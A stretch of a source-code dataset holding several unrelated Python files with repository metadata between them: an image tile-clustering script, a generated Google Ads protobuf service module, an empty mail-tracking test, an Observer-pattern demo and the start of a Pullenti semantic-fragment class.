self.pca_components = pca_components
self.tiler = GridTiler(tile_size=tile_size)
def hist_computer(self, img: Tensor):
r, _ = np.histogram(img[2], bins=self.bins, range=[0, 256])
r, _ = np.histogram(img[2], bins=self.bins, range=[0, 256])
r = r / np.linalg.norm(r)
g, _ = np.histogram(img[1], bins=self.bins, range=[0, 256])
g = g / np.linalg.norm(g)
b, _ = np.histogram(img[0], bins=self.bins, range=[0, 256])
b = b / np.linalg.norm(b)
return np.hstack((r, g, b))
class ClusterTagComputer(TagComputer):
    """Tag tiles by Wasserstein distance to reference cluster histograms.

    Reference histograms are computed from example tile images stored in
    one sub-directory per cluster under *path*.
    """

    def __init__(self, path: str, hist_computer: HistComputer):
        self.hist_computer = hist_computer
        # One list of histograms per sub-directory of *path*.
        self.clusters = [
            [hist_computer(cv2.imread(img_path)) for img_path in glob.glob('{}/{}/*.png'.format(path, _))]
            for _ in os.listdir(path)
        ]
        self.stats()

    def stats(self):
        # Debug visualisation: renders each histogram as a sorted image of
        # random samples drawn with the histogram as probability weights.
        # NOTE(review): plt.imshow is called without plt.show()/savefig,
        # so nothing is actually displayed or written anywhere.
        for _ in self.clusters:
            for c in _:
                bins = np.array(range(len(c)))
                prob = c / np.sum(c)
                image = np.sort(np.random.choice(bins, size=128 * 128, replace=True, p=prob)).reshape((128, 128))
                plt.imshow(image, 'gray')

    def __call__(self, data: Tensor):
        """Return the index of the cluster whose nearest reference
        histogram is closest (Wasserstein distance) to *data*'s histogram."""
        hist = self.hist_computer(data)
        d2 = [min([wasserstein_distance(hist, _) for _ in c]) for c in self.clusters]
        return int(np.argmin(d2))
class KmeanTagComputer(TagComputer):
    """Tag tiles with a PCA + KMeans pipeline fitted on tile histograms."""

    def __init__(self, p: Params, images: List[str], cluster_number: int):
        self.hist_computer = p.hist_computer
        self.model = KMeans(n_clusters=cluster_number, n_init=20)
        # Training set: one histogram per 32px tile of every input image.
        # NOTE(review): tiling here uses a fixed 32px GridTiler rather
        # than p.tiler — confirm whether that is intentional.
        dataset = []
        for _ in images:
            img = cv2.imread(_)
            boxes = GridTiler(tile_size=32).tiles(img.shape[:2])
            histograms = [p.hist_computer(box.cut(img)) for box in boxes]
            dataset.extend(histograms)
        self.pipeline = Pipeline(steps=[
            ('pca', PCA(n_components=p.pca_components)),
            ('clustering', self.model),
        ])
        self.pipeline.fit(dataset)
        # self.stats()

    def stats(self):
        # Debug visualisation of the fitted cluster centres (same sampling
        # trick as ClusterTagComputer.stats; plt.imshow without show()).
        centers = (self.model.cluster_centers_ + 1) / 2
        for c in centers:
            bins = np.array(range(len(c))) * 4
            prob = c / np.sum(c)
            image = np.sort(np.random.choice(bins, size=128 * 128, replace=True, p=prob)).reshape((128, 128))
            plt.imshow(image, 'gray')

    def __call__(self, data: Tensor):
        """Predict the KMeans cluster index for one tile."""
        hist = self.hist_computer(data)
        return self.pipeline.predict([hist])[0]
def tile_clustering(img: Tensor, tag_computer: TagComputer, tiler: GridTiler):
    """Return a copy of *img* with each tile outlined in its tag's colour."""
    out = img.copy()
    k = 8  # inset (px) so neighbouring rectangles do not touch
    for box in tiler.tiles(img.shape[:2]):
        flag = tag_computer(box.cut(img))
        pt1 = (box.left + k, box.top + k)
        pt2 = (box.right - k, box.bottom - k)
        # COLORS is the module-level palette below; matplotlib colour names
        # are converted to RGB tuples for cv2.
        # NOTE(review): scaling by 256 yields 256 for saturated channels;
        # 255 is the usual maximum — confirm intended.
        cv2.rectangle(out, pt1, pt2, tuple(256 * _ for _ in to_rgb(COLORS[flag])), 2)
    return out
# Rectangle colours indexed by cluster tag; supports up to 10 clusters.
COLORS = ['red', 'blue', 'green', 'white', 'yellow',
          'orange', 'purple', 'cyan', 'magenta', 'gray']

# Default hyper-parameters used by the __main__ entry point.
P = Params(
    bins=128,
    pca_components=128,
    tile_size=128
)

if __name__ == '__main__':
    dataset = 'cs'
    images = glob.glob('../tests/20190802_export_s2_it1/{}/*_?.png'.format(dataset))
    # Fit the KMeans tagger on all images; the cluster tagger reads
    # reference tiles from disk.
    model_tag_computer = KmeanTagComputer(P, images, cluster_number=4)
    cluster_tag_computer = ClusterTagComputer('../image_editor/tiles', P.hist_computer)
    os.makedirs(dataset, exist_ok=True)
    for _ in images:
        name = os.path.basename(_).replace('.tif', '')
        img = cv2.imread(_)
        # Annotate each image with the KMeans tags and write it out.
        img1 = tile_clustering(img, model_tag_computer, P.tiler)
        cv2.imwrite('{}/{}_model.png'.format(dataset, name), img1)
        # img2 = tile_clustering(img, cluster_tag_computer, P.tiler)
        # cv2.imwrite('{}/{}_clusters.png'.format(dataset, name), img2)
"[email protected]"
]
| |
4f0ef26fe165b0b46815ad51b62f6a0c0f470256 | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v5/proto/services/remarketing_action_service_pb2.py | 0495a4d9e848a5eed492faca8b8aa2397a32544c | [
"Apache-2.0"
]
| permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | true | 20,741 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v5/proto/services/remarketing_action_service.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v5.proto.resources import remarketing_action_pb2 as google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.protobuf import field_mask_pb2 as google_dot_protobuf_dot_field__mask__pb2
from google.rpc import status_pb2 as google_dot_rpc_dot_status__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v5/proto/services/remarketing_action_service.proto',
package='google.ads.googleads.v5.services',
syntax='proto3',
serialized_options=b'\n$com.google.ads.googleads.v5.servicesB\035RemarketingActionServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v5/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V5.Services\312\002 Google\\Ads\\GoogleAds\\V5\\Services\352\002$Google::Ads::GoogleAds::V5::Services',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nGgoogle/ads/googleads_v5/proto/services/remarketing_action_service.proto\x12 google.ads.googleads.v5.services\x1a@google/ads/googleads_v5/proto/resources/remarketing_action.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a google/protobuf/field_mask.proto\x1a\x17google/rpc/status.proto\"h\n\x1bGetRemarketingActionRequest\x12I\n\rresource_name\x18\x01 \x01(\tB2\xe0\x41\x02\xfa\x41,\n*googleads.googleapis.com/RemarketingAction\"\xc2\x01\n\x1fMutateRemarketingActionsRequest\x12\x18\n\x0b\x63ustomer_id\x18\x01 \x01(\tB\x03\xe0\x41\x02\x12U\n\noperations\x18\x02 \x03(\x0b\x32<.google.ads.googleads.v5.services.RemarketingActionOperationB\x03\xe0\x41\x02\x12\x17\n\x0fpartial_failure\x18\x03 \x01(\x08\x12\x15\n\rvalidate_only\x18\x04 \x01(\x08\"\xea\x01\n\x1aRemarketingActionOperation\x12/\n\x0bupdate_mask\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.FieldMask\x12\x46\n\x06\x63reate\x18\x01 \x01(\x0b\x32\x34.google.ads.googleads.v5.resources.RemarketingActionH\x00\x12\x46\n\x06update\x18\x02 \x01(\x0b\x32\x34.google.ads.googleads.v5.resources.RemarketingActionH\x00\x42\x0b\n\toperation\"\xa7\x01\n MutateRemarketingActionsResponse\x12\x31\n\x15partial_failure_error\x18\x03 \x01(\x0b\x32\x12.google.rpc.Status\x12P\n\x07results\x18\x02 \x03(\x0b\x32?.google.ads.googleads.v5.services.MutateRemarketingActionResult\"6\n\x1dMutateRemarketingActionResult\x12\x15\n\rresource_name\x18\x01 
\x01(\t2\x94\x04\n\x18RemarketingActionService\x12\xd9\x01\n\x14GetRemarketingAction\x12=.google.ads.googleads.v5.services.GetRemarketingActionRequest\x1a\x34.google.ads.googleads.v5.resources.RemarketingAction\"L\x82\xd3\xe4\x93\x02\x36\x12\x34/v5/{resource_name=customers/*/remarketingActions/*}\xda\x41\rresource_name\x12\xfe\x01\n\x18MutateRemarketingActions\x12\x41.google.ads.googleads.v5.services.MutateRemarketingActionsRequest\x1a\x42.google.ads.googleads.v5.services.MutateRemarketingActionsResponse\"[\x82\xd3\xe4\x93\x02<\"7/v5/customers/{customer_id=*}/remarketingActions:mutate:\x01*\xda\x41\x16\x63ustomer_id,operations\x1a\x1b\xca\x41\x18googleads.googleapis.comB\x84\x02\n$com.google.ads.googleads.v5.servicesB\x1dRemarketingActionServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v5/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V5.Services\xca\x02 Google\\Ads\\GoogleAds\\V5\\Services\xea\x02$Google::Ads::GoogleAds::V5::Servicesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_api_dot_client__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_protobuf_dot_field__mask__pb2.DESCRIPTOR,google_dot_rpc_dot_status__pb2.DESCRIPTOR,])
_GETREMARKETINGACTIONREQUEST = _descriptor.Descriptor(
name='GetRemarketingActionRequest',
full_name='google.ads.googleads.v5.services.GetRemarketingActionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.services.GetRemarketingActionRequest.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002\372A,\n*googleads.googleapis.com/RemarketingAction', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=349,
serialized_end=453,
)
_MUTATEREMARKETINGACTIONSREQUEST = _descriptor.Descriptor(
name='MutateRemarketingActionsRequest',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='customer_id', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.customer_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='operations', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.operations', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='partial_failure', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.partial_failure', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='validate_only', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.validate_only', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=456,
serialized_end=650,
)
_REMARKETINGACTIONOPERATION = _descriptor.Descriptor(
name='RemarketingActionOperation',
full_name='google.ads.googleads.v5.services.RemarketingActionOperation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='update_mask', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.update_mask', index=0,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='create', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.create', index=1,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='update', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.update', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='operation', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.operation',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=653,
serialized_end=887,
)
_MUTATEREMARKETINGACTIONSRESPONSE = _descriptor.Descriptor(
name='MutateRemarketingActionsResponse',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='partial_failure_error', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse.partial_failure_error', index=0,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='results', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse.results', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=890,
serialized_end=1057,
)
_MUTATEREMARKETINGACTIONRESULT = _descriptor.Descriptor(
name='MutateRemarketingActionResult',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.services.MutateRemarketingActionResult.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1059,
serialized_end=1113,
)
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['operations'].message_type = _REMARKETINGACTIONOPERATION
_REMARKETINGACTIONOPERATION.fields_by_name['update_mask'].message_type = google_dot_protobuf_dot_field__mask__pb2._FIELDMASK
_REMARKETINGACTIONOPERATION.fields_by_name['create'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION
_REMARKETINGACTIONOPERATION.fields_by_name['update'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION
_REMARKETINGACTIONOPERATION.oneofs_by_name['operation'].fields.append(
_REMARKETINGACTIONOPERATION.fields_by_name['create'])
_REMARKETINGACTIONOPERATION.fields_by_name['create'].containing_oneof = _REMARKETINGACTIONOPERATION.oneofs_by_name['operation']
_REMARKETINGACTIONOPERATION.oneofs_by_name['operation'].fields.append(
_REMARKETINGACTIONOPERATION.fields_by_name['update'])
_REMARKETINGACTIONOPERATION.fields_by_name['update'].containing_oneof = _REMARKETINGACTIONOPERATION.oneofs_by_name['operation']
_MUTATEREMARKETINGACTIONSRESPONSE.fields_by_name['partial_failure_error'].message_type = google_dot_rpc_dot_status__pb2._STATUS
_MUTATEREMARKETINGACTIONSRESPONSE.fields_by_name['results'].message_type = _MUTATEREMARKETINGACTIONRESULT
DESCRIPTOR.message_types_by_name['GetRemarketingActionRequest'] = _GETREMARKETINGACTIONREQUEST
DESCRIPTOR.message_types_by_name['MutateRemarketingActionsRequest'] = _MUTATEREMARKETINGACTIONSREQUEST
DESCRIPTOR.message_types_by_name['RemarketingActionOperation'] = _REMARKETINGACTIONOPERATION
DESCRIPTOR.message_types_by_name['MutateRemarketingActionsResponse'] = _MUTATEREMARKETINGACTIONSRESPONSE
DESCRIPTOR.message_types_by_name['MutateRemarketingActionResult'] = _MUTATEREMARKETINGACTIONRESULT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetRemarketingActionRequest = _reflection.GeneratedProtocolMessageType('GetRemarketingActionRequest', (_message.Message,), {
'DESCRIPTOR' : _GETREMARKETINGACTIONREQUEST,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Request message for [RemarketingActionService.GetRemarketingAction][go
ogle.ads.googleads.v5.services.RemarketingActionService.GetRemarketing
Action].
Attributes:
resource_name:
Required. The resource name of the remarketing action to
fetch.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.GetRemarketingActionRequest)
})
_sym_db.RegisterMessage(GetRemarketingActionRequest)
MutateRemarketingActionsRequest = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionsRequest', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONSREQUEST,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Request message for [RemarketingActionService.MutateRemarketingActions
][google.ads.googleads.v5.services.RemarketingActionService.MutateRema
rketingActions].
Attributes:
customer_id:
Required. The ID of the customer whose remarketing actions are
being modified.
operations:
Required. The list of operations to perform on individual
remarketing actions.
partial_failure:
If true, successful operations will be carried out and invalid
operations will return errors. If false, all operations will
be carried out in one transaction if and only if they are all
valid. Default is false.
validate_only:
If true, the request is validated but not executed. Only
errors are returned, not results.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionsRequest)
})
_sym_db.RegisterMessage(MutateRemarketingActionsRequest)
RemarketingActionOperation = _reflection.GeneratedProtocolMessageType('RemarketingActionOperation', (_message.Message,), {
'DESCRIPTOR' : _REMARKETINGACTIONOPERATION,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """A single operation (create, update) on a remarketing action.
Attributes:
update_mask:
FieldMask that determines which resource fields are modified
in an update.
operation:
The mutate operation.
create:
Create operation: No resource name is expected for the new
remarketing action.
update:
Update operation: The remarketing action is expected to have a
valid resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.RemarketingActionOperation)
})
_sym_db.RegisterMessage(RemarketingActionOperation)
MutateRemarketingActionsResponse = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionsResponse', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONSRESPONSE,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Response message for remarketing action mutate.
Attributes:
partial_failure_error:
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial\_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results:
All results for the mutate.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionsResponse)
})
_sym_db.RegisterMessage(MutateRemarketingActionsResponse)
MutateRemarketingActionResult = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionResult', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONRESULT,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """The result for the remarketing action mutate.
Attributes:
resource_name:
Returned for successful operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionResult)
})
_sym_db.RegisterMessage(MutateRemarketingActionResult)
DESCRIPTOR._options = None
_GETREMARKETINGACTIONREQUEST.fields_by_name['resource_name']._options = None
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['customer_id']._options = None
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['operations']._options = None
_REMARKETINGACTIONSERVICE = _descriptor.ServiceDescriptor(
name='RemarketingActionService',
full_name='google.ads.googleads.v5.services.RemarketingActionService',
file=DESCRIPTOR,
index=0,
serialized_options=b'\312A\030googleads.googleapis.com',
create_key=_descriptor._internal_create_key,
serialized_start=1116,
serialized_end=1648,
methods=[
_descriptor.MethodDescriptor(
name='GetRemarketingAction',
full_name='google.ads.googleads.v5.services.RemarketingActionService.GetRemarketingAction',
index=0,
containing_service=None,
input_type=_GETREMARKETINGACTIONREQUEST,
output_type=google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION,
serialized_options=b'\202\323\344\223\0026\0224/v5/{resource_name=customers/*/remarketingActions/*}\332A\rresource_name',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='MutateRemarketingActions',
full_name='google.ads.googleads.v5.services.RemarketingActionService.MutateRemarketingActions',
index=1,
containing_service=None,
input_type=_MUTATEREMARKETINGACTIONSREQUEST,
output_type=_MUTATEREMARKETINGACTIONSRESPONSE,
serialized_options=b'\202\323\344\223\002<\"7/v5/customers/{customer_id=*}/remarketingActions:mutate:\001*\332A\026customer_id,operations',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_REMARKETINGACTIONSERVICE)
DESCRIPTOR.services_by_name['RemarketingActionService'] = _REMARKETINGACTIONSERVICE
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
]
| |
d6ce1c57d5d48ad3fcd540884b07b83997ecc399 | 4c3e992678341ccaa1d4d14e97dac2e0682026d1 | /addons/mass_mailing/tests/test_mail.py | 09822f1c111822ef55b13830edbcad40590accf1 | []
| no_license | gahan-corporation/wyatt | 3a6add8f8f815bd26643e1e7c81aea024945130d | 77e56da362bec56f13bf0abc9f8cf13e98461111 | refs/heads/master | 2021-09-03T18:56:15.726392 | 2018-01-08T02:54:47 | 2018-01-08T02:54:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from gerp.addons.mail.tests.common import TestMail
class test_message_compose(TestMail):
    # NOTE(review): class and method keep their original (non-PEP8) names so
    # the test runner still discovers them; "OO" in the method name looks like
    # it may have been intended as "00" — confirm before renaming.

    def test_OO_mail_mail_tracking(self):
        """ Tests designed for mail_mail tracking (opened, replied, bounced) """
        # Placeholder: no tracking scenario has been implemented yet.
        pass
| [
"[email protected]"
]
| |
c3814fd79b1a1d8c165a84db0088b1cace467d56 | 417e6eb589d3441c3c8b9901e2d35873dd35f097 | /src/structural/observer.py | 0ea844bf4d99f8480fb048987da3a1e944975507 | []
| no_license | vmgabriel/pattern-python | 4fc6127ebdb521d0a4a7b10b4b68880f691ee630 | 74f1cd1314a79060d1df1a6df018c39572bc2b4c | refs/heads/master | 2023-04-24T06:45:16.773415 | 2021-05-10T21:14:51 | 2021-05-10T21:14:51 | 365,394,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | """Observer Pattern"""
# Libraries
from abc import ABCMeta, abstractmethod
class Publisher(metaclass=ABCMeta):
    """Abstract subject of the Observer pattern.

    Concrete publishers keep a registry of observers and push each new post
    to all of them.  The methods are now marked ``@abstractmethod`` — the
    class already declared ``metaclass=ABCMeta`` (and the module imports
    ``abstractmethod``), but every method was a silent no-op, so the
    "interface" could be instantiated directly by mistake.
    """

    @abstractmethod
    def add_observer(self, observer):
        """Register *observer* to receive future posts."""

    @abstractmethod
    def remove_observer(self, observer):
        """Unregister a previously added *observer*."""

    @abstractmethod
    def notify_all(self):
        """Send the latest post to every registered observer."""

    @abstractmethod
    def write_post(self, text):
        """Publish *text* and notify all observers."""
class PlatziForum(Publisher):
    """Concrete publisher: a forum whose subscribers hear about every post."""

    def __init__(self):
        self.users_list = []
        self.post = None

    def add_observer(self, observer):
        """Subscribe *observer* unless it is already registered."""
        if observer in self.users_list:
            return
        self.users_list.append(observer)

    def remove_observer(self, observer):
        """Unsubscribe *observer* (ValueError if it was never added)."""
        self.users_list.remove(observer)

    def notify_all(self):
        """Push the latest post to every subscriber, in subscription order."""
        for subscriber in self.users_list:
            subscriber.notify(self.post)

    def write_post(self, text):
        """Store *text* as the newest post and broadcast it immediately."""
        self.post = text
        self.notify_all()
class Subscriber(metaclass=ABCMeta):
    """Abstract observer: concrete subscribers react to new forum posts.

    ``notify`` is abstract instead of a silent no-op (the previous ``pass``
    body let a subclass forget to implement it and fail silently); this
    mirrors the abstract ``Publisher`` side of the pattern.
    """

    @abstractmethod
    def notify(self, post):
        """Handle the newly published *post*."""
class UserA(Subscriber):
    """Concrete observer for user A: logs each notification to stdout.

    The previous no-op ``__init__`` (body was just ``pass``) added nothing
    over the inherited constructor and has been removed.
    """

    def notify(self, post):
        """Print confirmation that user A was notified of *post*."""
        print('User A ha sido notificado - {}'.format(post))
class UserB(Subscriber):
    """Concrete observer for user B: logs each notification to stdout.

    The previous no-op ``__init__`` (body was just ``pass``) added nothing
    over the inherited constructor and has been removed.
    """

    def notify(self, post):
        """Print confirmation that user B was notified of *post*."""
        print('User B ha sido notificado - {}'.format(post))
if __name__ == '__main__':
    # Demo: both subscribers are notified when the forum publishes a post.
    forum = PlatziForum()
    audience = (UserA(), UserB())
    for member in audience:
        forum.add_observer(member)
    forum.write_post('Post en Platzi')
| [
"[email protected]"
]
| |
be868d1d34aa3dad1df6b4c850a30a4565685c4c | e22390ec9aa1a842626075113472f81076e1bf5f | /pullenti/semantic/SemFragment.py | 3954b163c1693d239274475b64e5e3f1cd4930fb | []
| no_license | pullenti/PullentiPython | ba9f450f3f49786732e80f34d0506d4a6d41afc3 | 815d550b99f113034c27f60d97493ce2f8e4cfcc | refs/heads/master | 2021-06-22T17:12:36.771479 | 2020-12-11T06:10:23 | 2020-12-11T06:10:23 | 161,268,453 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,299 | py | # Copyright (c) 2013, Pullenti. All rights reserved.
# Non-Commercial Freeware and Commercial Software.
# This class is generated using the converter UniSharping (www.unisharping.ru) from Pullenti C#.NET project.
# The latest version of the code is available on the site www.pullenti.ru
import typing
from pullenti.unisharp.Utils import Utils
from pullenti.ner.core.GetTextAttr import GetTextAttr
from pullenti.ner.core.MiscHelper import MiscHelper
from pullenti.semantic.ISemContainer import ISemContainer
from pullenti.semantic.SemGraph import SemGraph
from pullenti.semantic.SemFragmentType import SemFragmentType
from pullenti.semantic.SemObjectType import SemObjectType
class SemFragment(ISemContainer):
    """A fragment of a block (a sentence)."""

    def __init__(self, blk : 'SemBlock') -> None:
        self.__m_graph = SemGraph()
        self.m_higher = None;
        # Fragment type; UNDEFINED until classified by the parser.
        self.typ = SemFragmentType.UNDEFINED
        self.is_or = False
        # First/last tokens covered by the fragment (may remain None).
        self.begin_token = None;
        self.end_token = None;
        # Free slot for client data.
        self.tag = None;
        self.m_higher = blk

    @property
    def graph(self) -> 'SemGraph':
        """Objects of the fragment (note that some of the objects linked to
        this block may reside in the graphs of higher levels)."""
        return self.__m_graph

    @property
    def higher(self) -> 'ISemContainer':
        # ISemContainer implementation: the owning container.
        return self.m_higher

    @property
    def block(self) -> 'SemBlock':
        """Owner of the fragment."""
        return self.m_higher

    @property
    def root_objects(self) -> typing.List['SemObject']:
        """List of SemObject items that have no links (empty ``links_to``).
        In a normal parse there should be exactly one such object -
        usually the predicate."""
        res = list()
        for o in self.__m_graph.objects:
            if (len(o.links_to) == 0):
                res.append(o)
        return res

    @property
    def can_be_error_structure(self) -> bool:
        """True when the fragment has more than one root object and not all
        of those roots are verbs - a hint of a mis-parsed structure."""
